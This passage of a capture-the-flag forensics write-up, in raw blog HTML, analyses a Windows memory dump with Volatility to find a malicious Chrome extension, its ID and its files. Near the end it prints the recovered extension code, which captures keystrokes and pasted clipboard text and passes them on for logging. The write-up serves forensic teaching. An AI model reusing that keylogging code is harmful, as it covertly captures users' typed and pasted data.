Flags.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 549px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ad979de077fd10099ec8f071437715f6/928ea/image-20250323103645032.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 145%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAdCAYAAACqhkzFAAAACXBIWXMAAAsTAAALEwEAmpwYAAADpUlEQVRIx41V2VbiQBDNBzggsssiWxYIISxh3xFk1NHxzDx49GUe5v+/oaZudQKIivNwU51O59atpbs1o7kgs7WkevdGbLWzpozuUbrUosty+7+AtZlKh1LFJmnTzS96ev5Lm4dXxgvd//5Dtc6SElcNWfAV0oxE3iG9MaOCNSDNcGfkDrZkstJ6d02NvhpXnKnYcn1ChjsnRKKzBUr2WL5XmATvV0wEAekSKyzWRjJZxgJnJgAJ5pAC/AhCKAgQkGEeTuEApAhfC3KgsA8D4yA3XyHLOc9UPKUwZ3Q5Z2suxrUUxmqvxGu1fS2e4fArQogw3AW1xj9IAzvCQwggMg5QtEc7BaeANYXqUFKhJTmZ52mTLjJVCiV1OotX6BsjlNDpPGVKBQ8Rz9c/gEOxnC3QLi4tTmifq+SQ21vRaHFPg/kd9We35HgLJq4Iwkllz1PGp4iyKC3ChKjWJReg1lpQc3DD2FKjtyG7s5LeKnMuYUvcERGO5iQhJEfSBkFpNFPbI1ujWNamJCtPFVxCapKFhvz0EZAyCTmeqzG7zoTwgtDKMj6EcujbjMkE5t5i3l8Xy7LCEOdmsnokozGiZn/J+bsV4mPSjwDn2UqL09GjeK5KEKdFsxhYFGNvsKmCLQsVShROKIQSR2P+HknrojKWtfyxxYQcu96YSj8hR3mzx+MOoeFR/UJ1IChxTwbjoj3k7x6Hbe3yFw1yiCp7syfZo0ZzTu7wTnZMY3ArjSrEQjgWBwDI82ZfFc7vvygDBZYqx3J1mYQ6/IDFsNibwbeY/wMAZRAiREKqukII0T+z769U89ZCWOW9XHYmoljt6RVvTTW2/IMYWy1ok53CgBAPvCAH8BpGk6YVwtxOALammjcFQahvQt4p5AWT7Yt4xjno9LZy4kCx3d3IqWN7G5lLFV05SA+VvSPES9a/Q1AUHGUgAmGdyTEGoc3vVntJxdpwl79DlTtCbDlUFFWUY4h/QC5h8XPOH0uF/fbB909DRnIRJs4+HPlNbpvm6F7aBxboTB/5rvkucxijUIdkbwiRk7NYicMwJcQgd+g/LECz42jbt446E48L86Yo482zJB1hoTVK9fHuQkIqEDpOdazB+3G474oCNWhiUcSVhCqlTFlUV+4WXd0fJwmRw0BdptKmvFh1j8ARCgAnqOxFsG9P9SEW4rZCeMhdd/4kiW9PHsR6s58yD2XHBJ8UxZHLCcRJPpkROsJLsZXQWR1CPizEqcb+By7/RenBUpplAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ad979de077fd10099ec8f071437715f6/8ac56/image-20250323103645032.webp 240w,\n/static/ad979de077fd10099ec8f071437715f6/d3be9/image-20250323103645032.webp 480w,\n/static/ad979de077fd10099ec8f071437715f6/42c6f/image-20250323103645032.webp 549w\"\n              sizes=\"(max-width: 549px) 100vw, 549px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ad979de077fd10099ec8f071437715f6/8ff5a/image-20250323103645032.png 240w,\n/static/ad979de077fd10099ec8f071437715f6/e85cb/image-20250323103645032.png 480w,\n/static/ad979de077fd10099ec8f071437715f6/928ea/image-20250323103645032.png 549w\"\n            sizes=\"(max-width: 549px) 100vw, 549px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ad979de077fd10099ec8f071437715f6/928ea/image-20250323103645032.png\"\n            alt=\"image-20250323103645032\"\n            title=\"image-20250323103645032\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The memory dump provided as the challenge file was an ELF-format file.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">readelf -a ELF memdump.elf</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 802px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/62effab36915add533b8a20367f862c7/5a6dd/image-20250323103108160.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 102.91666666666669%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAACyUlEQVQ4y3VUWZaiQBD0HLYLoOwo+yKKSzfz4/3vk5MRWj5xej5KEKjYMrNmm81G8jyXummk73vZ7XbiOI6sVitZr9ev9fn/f2u2XluSJIlkWSYAd11PgiCQMIokDEOJ45jv030qEZ9FfOb7viyXSy5DiDVbrday3++lKks+sCxLbNueXAM/kFLfZ2lGcEMEApC/q5/hBy8Ph4Nst1syGjas5WIhnqoJw4CqEAmcgAzXz3hoOVIbsAyb+Oj9AxAgBqgCYaBXgCyUCOsfy5btkLXvDwQzHxlQ3MPWoeu0eIUUZfEgV2DsCwJ/qtBS6cii0Srvkh1V4j+yI6AS4FmqOS+Xj4xNvibjKaBlM580TckIJWVZSV3XVAyFsIrWQvGS3aMjTJUN2MRyEifStZ1+FLCKAIYl27YYAe7hgO2iFj3Po7p3sJdCWwGxAQoyXVVd6eaaJGaT67pS5I/sYBEkE7DPDMFcKFiiGVZVxZ6EIlj++vriFcpRnN+UfRTlUeXj8SilgnWaIXpyGAZmBnuxqi2KgsX6bQwngI6zka27JbtZUIRCYAHQNDzUfvbop0oCRnEkuSpAjigEN+pLV4lwP5/PuQHRmMrjvyF/ny4CovPRNm3b0pavqjaqahxHaeqGRcPz6/XKSJAvIjjo6TQMp8nsE9B+NnevOZpNUHM6DcyzbZtnn+4JBED8R8bIuihyfo9nM6izFR0qoBBnIqx7vqfN3XATioYNfX/kMVZVNRvfgJjZflmGQmy63b5l/DNqxXsCXS4XqkErxeqg1eYH6XA6aRQ1Z/t8PvNogyAC2lBoLKu6k1poFQR9B7vFs1hJEhMA9wCAAPQtAPd6b2afk0LAMHpZrnVaOG5qOdXpgC0QAJyHsSrGFf0J+5ikxfMYo2WUHtmczxf5GX9UWUfFZ1Wb6inNQ0EB8R5FuN/vHASA3W43HmHmXPwL8vBqdy4VnZUAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/62effab36915add533b8a20367f862c7/8ac56/image-20250323103108160.webp 240w,\n/static/62effab36915add533b8a20367f862c7/d3be9/image-20250323103108160.webp 480w,\n/static/62effab36915add533b8a20367f862c7/85811/image-20250323103108160.webp 802w\"\n              sizes=\"(max-width: 802px) 100vw, 802px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/62effab36915add533b8a20367f862c7/8ff5a/image-20250323103108160.png 240w,\n/static/62effab36915add533b8a20367f862c7/e85cb/image-20250323103108160.png 480w,\n/static/62effab36915add533b8a20367f862c7/5a6dd/image-20250323103108160.png 802w\"\n            sizes=\"(max-width: 802px) 100vw, 802px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/62effab36915add533b8a20367f862c7/5a6dd/image-20250323103108160.png\"\n            alt=\"image-20250323103108160\"\n            title=\"image-20250323103108160\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Because of that, I initially mistook it for a Linux memory dump. However, when I tried analyzing it with Vol2, I realized it was actually a dump of the <code class=\"language-text\">VirtualBoxCoreDumpElf64</code> type, and that the environment where the dump had been captured was in fact Windows.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d1c21e6bf01495d792e5f3b8c5038060/0d6fe/image-20250323130932499.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAmUlEQVQI1zWOSQqAMAxF3TpUcCFi7SBOSLVFKl31/uf6koCL8Mhv8prCOYfzPEF83xfee1zXhX3fmZSv64p5nmGtxTRNkFJiHEfOh2HgnnIhBAp6aNuWh0lMFWOEMYaFOWeklPA8D+c/Qwg4joOFtE8yYlGWJeq6RtM0qKoKXdfx8LIs2LYN932znEopBa01f/5fSwf97PseH5pKUnjfXKFCAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d1c21e6bf01495d792e5f3b8c5038060/8ac56/image-20250323130932499.webp 240w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/d3be9/image-20250323130932499.webp 480w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/e46b2/image-20250323130932499.webp 960w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/177a2/image-20250323130932499.webp 1115w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d1c21e6bf01495d792e5f3b8c5038060/8ff5a/image-20250323130932499.png 240w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/e85cb/image-20250323130932499.png 480w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/d9199/image-20250323130932499.png 960w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/0d6fe/image-20250323130932499.png 1115w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d1c21e6bf01495d792e5f3b8c5038060/d9199/image-20250323130932499.png\"\n            alt=\"image-20250323130932499\"\n            title=\"image-20250323130932499\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Volatility can analyze <code class=\"language-text\">VirtualBoxCoreDumpElf64</code> dumps directly.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">vol -f memdump.elf windows.info</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ad315f8cf955ab1c47d2fd4fb9f0f058/f705a/image-20250323131514303.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAt0lEQVQoz6WP2Q6CMBREC0JZDUuBVkFQWYSo//95Iy0E9BF8mEzae3NmLqmHEvktxaUsELMYURSBJWz0ELqugxCyTUIIMJYokH/0YVnWLApKKUzT/BWdXM5t21a70uWfYRxA2q7B6SwQBAGyLIXnexOImsuyfK9Bq+RskrWEk9f7ibIazy5y1M0dmqZtP/NbEljNQNnQcabU3cB+6NG0Dbjg4Jyr6n817B4dVMtrpaBhGMJ13d3gD/kmmJcfHHKXAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ad315f8cf955ab1c47d2fd4fb9f0f058/8ac56/image-20250323131514303.webp 240w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/d3be9/image-20250323131514303.webp 480w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/e46b2/image-20250323131514303.webp 960w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/f992d/image-20250323131514303.webp 1440w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/e8e93/image-20250323131514303.webp 1493w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ad315f8cf955ab1c47d2fd4fb9f0f058/8ff5a/image-20250323131514303.png 240w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/e85cb/image-20250323131514303.png 480w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/d9199/image-20250323131514303.png 960w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/07a9c/image-20250323131514303.png 1440w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/f705a/image-20250323131514303.png 1493w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ad315f8cf955ab1c47d2fd4fb9f0f058/d9199/image-20250323131514303.png\"\n            alt=\"image-20250323131514303\"\n            title=\"image-20250323131514303\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So first, I identified Chrome’s PID, which is the first Flag, with the following command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">vol -f memdump.elf windows.cmdline.CmdLine</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9ed285191880256fc8dbe498941741d0/bf6f8/image-20250323132256390.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 11.666666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVQI1yWL3QqCQBQGfZjQXdP1/Hg280qIIILo/Z9mWuli+BiGr0vXzPs+s8tEzCOfSLzWzDd6dp1QX3F3wo2tBrdorsrmQnXFWjuJCGqtdMOYOSyxzhnJiYf0HMvAUy5EGSmiqP5xa2cz1BRRwRoqC0spbU9XfvbuP08KV9S1AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9ed285191880256fc8dbe498941741d0/8ac56/image-20250323132256390.webp 240w,\n/static/9ed285191880256fc8dbe498941741d0/d3be9/image-20250323132256390.webp 480w,\n/static/9ed285191880256fc8dbe498941741d0/e46b2/image-20250323132256390.webp 960w,\n/static/9ed285191880256fc8dbe498941741d0/f992d/image-20250323132256390.webp 1440w,\n/static/9ed285191880256fc8dbe498941741d0/882b9/image-20250323132256390.webp 1920w,\n/static/9ed285191880256fc8dbe498941741d0/2b8a8/image-20250323132256390.webp 2047w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9ed285191880256fc8dbe498941741d0/8ff5a/image-20250323132256390.png 240w,\n/static/9ed285191880256fc8dbe498941741d0/e85cb/image-20250323132256390.png 480w,\n/static/9ed285191880256fc8dbe498941741d0/d9199/image-20250323132256390.png 960w,\n/static/9ed285191880256fc8dbe498941741d0/07a9c/image-20250323132256390.png 1440w,\n/static/9ed285191880256fc8dbe498941741d0/29114/image-20250323132256390.png 1920w,\n/static/9ed285191880256fc8dbe498941741d0/bf6f8/image-20250323132256390.png 2047w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9ed285191880256fc8dbe498941741d0/d9199/image-20250323132256390.png\"\n            alt=\"image-20250323132256390\"\n            title=\"image-20250323132256390\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 1. What is the PID of the Original (First) Google Chrome process:</span>\n<span class=\"token number\">4080</span>\tchrome.exe\t<span class=\"token string\">\"C:\\Program Files\\Google\\Chrome\\Application<span class=\"token entity\" title=\"\\c\">\\c</span>hrome.exe\"</span>\n\nIncidentally, when I tried to analyze this dump using the latest version of Volatility <span class=\"token number\">3</span>, it failed with an <span class=\"token variable\"><span class=\"token variable\">`</span>_MM_SESSION_SPACE<span class=\"token variable\">`</span></span> error. That issue had already been fixed <span class=\"token keyword\">in</span> the following PR, so reinstalling from the latest branch resolved it.\n\nReference: <span class=\"token punctuation\">[</span>Windows: Handle missing _MM_SESSION_SPACE by dgmcdona · Pull Request <span class=\"token comment\">#1399 · volatilityfoundation/volatility3 · GitHub](https://github.com/volatilityfoundation/volatility3/pull/1399)</span>\n\nThe next Flag can be obtained simply by using strings or by running the <span class=\"token variable\"><span class=\"token variable\">`</span>vol -f memdump.elf windows.filescan<span class=\"token variable\">`</span></span> command.\n\n``` <span class=\"token function\">bash</span>\n<span class=\"token comment\"># 2. What is the only Folder on the Desktop</span>\nmalext</code></pre></div>\n<p>Next, searching the results of <code class=\"language-text\">vol -f memdump.elf windows.filescan</code> for extension-related entries lets you extract several extension IDs, and one of them turns out to be the Flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 3. What is the Extention's ID (ex: hlkenndednhfkekhgcdicdfddnkalmdm)</span>\nnnjofihdjilebhiiemfmdlpbdkbjcpae</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8d2be198658c8ec44ebb02b3be12e428/6edca/image-20250327220238511.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 6.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAARklEQVQI1x2LMQ6AMAwDWaqMdCCMpXGS8v8XmpThZJ8sH4ZJwLje5O4e+N0KuHFWDr0YrRHPqN0ZGcxif3IF9Vb2flJE+AFB3hsD7LvJxQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8d2be198658c8ec44ebb02b3be12e428/8ac56/image-20250327220238511.webp 240w,\n/static/8d2be198658c8ec44ebb02b3be12e428/d3be9/image-20250327220238511.webp 480w,\n/static/8d2be198658c8ec44ebb02b3be12e428/e46b2/image-20250327220238511.webp 960w,\n/static/8d2be198658c8ec44ebb02b3be12e428/2d20a/image-20250327220238511.webp 1351w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8d2be198658c8ec44ebb02b3be12e428/8ff5a/image-20250327220238511.png 240w,\n/static/8d2be198658c8ec44ebb02b3be12e428/e85cb/image-20250327220238511.png 480w,\n/static/8d2be198658c8ec44ebb02b3be12e428/d9199/image-20250327220238511.png 960w,\n/static/8d2be198658c8ec44ebb02b3be12e428/6edca/image-20250327220238511.png 1351w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8d2be198658c8ec44ebb02b3be12e428/d9199/image-20250327220238511.png\"\n            alt=\"image-20250327220238511\"\n            title=\"image-20250327220238511\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From reading other writeups, it seems that because this extension was not downloaded from the store, it does not exist in the normal <code class=\"language-text\">User Data/Default/Extensions</code> folder and is instead placed under the local storage path <code class=\"language-text\">User Data\\Default\\Local Extension Settings</code>.</p>\n<p>As confirmed in the previous Flag, the suspicious extension’s code appeared to be placed in <code class=\"language-text\">malext</code> on the Desktop.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 925px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/10049c663c10aedbe034b46d6712e5e8/2a50c/image-20250327221536229.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAo0lEQVQI122OzQ6CMACDIcYbCYIMFeVnA+Y2QMTw/q/2OT2QmHho2ku/NugfVyqb0ThB1RWUUqPvXkajzidMLlBKYqzBDZZjdiQIAsIw/PEtr+vKrShRssU5izE90zQwLjNLcWHa7bAe9hmpm5ooijbAXy2vJ42skarxL+7f4jg6hnli9kC339O2isGPaN3T646yKknTlNy/T9IE4T0+xAiR8QaPoU2Pf0TJxAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/10049c663c10aedbe034b46d6712e5e8/8ac56/image-20250327221536229.webp 240w,\n/static/10049c663c10aedbe034b46d6712e5e8/d3be9/image-20250327221536229.webp 480w,\n/static/10049c663c10aedbe034b46d6712e5e8/31b98/image-20250327221536229.webp 925w\"\n              sizes=\"(max-width: 925px) 100vw, 925px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/10049c663c10aedbe034b46d6712e5e8/8ff5a/image-20250327221536229.png 240w,\n/static/10049c663c10aedbe034b46d6712e5e8/e85cb/image-20250327221536229.png 480w,\n/static/10049c663c10aedbe034b46d6712e5e8/2a50c/image-20250327221536229.png 925w\"\n            sizes=\"(max-width: 925px) 100vw, 925px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/10049c663c10aedbe034b46d6712e5e8/2a50c/image-20250327221536229.png\"\n            alt=\"image-20250327221536229\"\n            title=\"image-20250327221536229\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I extracted the extension code with the following commands.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">vol -o /tmp -f memdump.elf windows.dumpfiles.DumpFiles --virtaddr 0xa708c8d9ec30\nvol -o /tmp -f memdump.elf windows.dumpfiles.DumpFiles --virtaddr 0xa708c8da1e30</code></pre></div>\n<p>Reading this code shows that the logs were probably stored in <code class=\"language-text\">chrome.storage.local</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">var</span> conn <span class=\"token operator\">=</span> chrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span><span class=\"token function\">connect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">name</span><span class=\"token operator\">:</span> <span class=\"token string\">\"conn\"</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\nchrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span><span class=\"token function\">sendMessage</span><span class=\"token punctuation\">(</span><span class=\"token string\">'update'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token punctuation\">(</span><span class=\"token keyword\">async</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> response <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> chrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span><span class=\"token function\">sendMessage</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">check</span><span class=\"token operator\">:</span> <span class=\"token string\">\"replace_html\"</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span>response<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\nchrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span><span class=\"token function\">sendMessage</span><span class=\"token punctuation\">(</span><span class=\"token string\">'replace_html'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">response</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    conn<span class=\"token punctuation\">.</span><span class=\"token function\">postMessage</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token string-property property\">\"type\"</span><span class=\"token operator\">:</span> <span class=\"token string\">\"check\"</span><span class=\"token punctuation\">,</span> <span class=\"token string-property property\">\"data\"</span><span class=\"token operator\">:</span> <span class=\"token string\">\"replace_html\"</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\ndocument<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"keydown\"</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">event</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> key <span class=\"token operator\">=</span> event<span class=\"token punctuation\">.</span>key<span class=\"token punctuation\">;</span>\n    conn<span class=\"token punctuation\">.</span><span class=\"token function\">postMessage</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token string-property property\">\"type\"</span><span class=\"token operator\">:</span> <span class=\"token string\">\"key\"</span><span class=\"token punctuation\">,</span> <span class=\"token string-property property\">\"data\"</span><span class=\"token operator\">:</span> key <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">return</span> <span class=\"token boolean\">true</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n\ndocument<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"paste\"</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">event</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">let</span> paste <span class=\"token operator\">=</span> event<span class=\"token punctuation\">.</span>clipboardData<span class=\"token punctuation\">.</span><span class=\"token function\">getData</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"text/plain\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    conn<span class=\"token punctuation\">.</span><span class=\"token function\">postMessage</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token string-property property\">\"type\"</span><span class=\"token operator\">:</span> <span class=\"token string\">\"paste\"</span><span class=\"token punctuation\">,</span> <span class=\"token string-property property\">\"data\"</span><span class=\"token operator\">:</span> paste <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">return</span> <span class=\"token boolean\">true</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n\n<span class=\"token keyword\">function</span> <span class=\"token function\">addLog</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">s</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    \n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">.</span>length <span class=\"token operator\">!=</span> <span class=\"token number\">1</span> <span class=\"token operator\">&amp;&amp;</span> s <span class=\"token operator\">!==</span> <span class=\"token 